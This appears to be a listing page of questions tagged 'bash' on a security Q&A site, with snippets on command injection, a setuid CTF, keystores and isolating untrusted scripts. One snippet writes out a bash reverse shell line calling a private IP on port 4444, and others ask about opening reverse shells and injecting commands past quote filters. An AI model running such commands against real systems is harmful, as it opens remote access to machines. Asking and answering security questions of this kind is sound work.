Questions tagged [bash]
The Bourne-again shell (Bash) is a unix shell. It lets the user run commands on the host machine in as a text based program. Questions using this tag should either be related to vulnerabilities of bash or proper use of specific commands.
163 questions
5
votes
3
answers
1k
views
Are these bash lines (handling untrusted user input) vulnerable to command injection?
If $1 contains untrusted user input for example $(whoami). Are any of the following bash examples vulnerable to command injection?
I'm having issues clearly understanding this behavior in Bash. Also, ...
- 7,715
0
votes
0
answers
85
views
benefit to reading sensitive file chunks via a "middleman" shell script?
tldr: is using a script spawned by my main process, which reads only a chunk of a sensitive file then passing the result to my main process - of any benefit?
in contrast to loading the file in my ...
- 101
3
votes
2
answers
312
views
Is this code vulnerable to injection?
I'm reviewing code which apparently ignores all security standards but doesn't seem to be exploitable due to its peculiar construction. The first stage is a Java Spring application and the name ...
- 31
0
votes
0
answers
43
views
Python os.system() does not change EUID to 0, but os.execl() does, why? [duplicate]
I was working on a Capture the Flag (CTF) challenge that involved a setuid-enabled binary, '/usr/bin/python', where the owner is 'root.' I assumed the user was "www-data", with UID=33.
The ...
0
votes
0
answers
321
views
how to exploit read -p in bash script
i wanna execute ls command inplace of the output being "your name is ls"
is there a way to do it ?
read -p "name??" name
echo "your name is $name"
0
votes
0
answers
1k
views
Bash reverse shell as a URL parameter value
I try to put bash reverse shell as a URL parameter. The command is as follows:
bash -i >& /dev/tcp/192.168.56.105/4444 0>&1
I have encoded the above code with URL encoding
bash%20-i%20%...
- 1
0
votes
1
answer
242
views
Auto-opening a reverse bash shell
Is it possible to use a tool like netcat to create a listener on the attacker's device with a specific command that when the target device or machine connects to this IP and port, it runs a bash shell ...
- 3
4
votes
1
answer
278
views
GPG allows importing an invalid secp256k1 public key
I came across a PGP public key that seems invalid. The key is a secp256k1 public key that supported by GPG. In fact, GPG allows importing that key even if it has an invalid secp256k1 public key inside....
- 143
1
vote
1
answer
3k
views
Doing a diff between two keystore files
I have a keystore file with certificates and I want to compare if the second keystore has exactly the same contents as the first one.
One approach would be to extract the certificates using keytool ...
- 221
0
votes
0
answers
166
views
How to isolate a bash script process?
I have a bash script that opens various random files that could be anything (PDF, xlsx, MKV, MP4, WebM, html). Since I don't fully trust the source of these files, there is a chance that some of them ...
1
vote
0
answers
2k
views
How can you perform OS Command Injection when single-quotes are filtered?
While attempting OS Command Injection on a url.com/?ping= parameter, I see that all single quotes ' are being escaped and replaced by \\'.
This is problematic because whenever you submit a value to ?...
- 11
-1
votes
1
answer
161
views
How i can grep only subdomain names without "target.com" [closed]
i have w wordlist of subdomains contains like this :
admin.bugbountytarget.com
portal.bugbountytarget.com
sales.bugbountytarget.com
vpn1.bugbountytarget.com
dev.test.bugbountytarget.com
...
And I ...
0
votes
1
answer
494
views
bash: how to securely source a script from an environment variable
Say I want to do source $VIRTUAL_ENV/bin/activate in my bashrc whenever the VIRTUAL_ENV is defined.
In general, the idea of running a script pointed by an environment variable seems a bit fishy as it ...
- 103
1
vote
1
answer
224
views
What scenarios does calling `clear` at the end of an ssh session protect against?
I have noticed that some server configurations put a clear command in the default ~/.bash_logout file, also with the comment "Clear the screen for security's sake". I can see that this ...
- 683
7
votes
2
answers
2k
views
/opt and sudo unzip to /opt, is it safe?
Usually we place things in /opt so they are owned by root but normal users can execute them. This prevents normal users modifying the binaries so they cannot execute arbitrary stuff. However, to put ...
- 317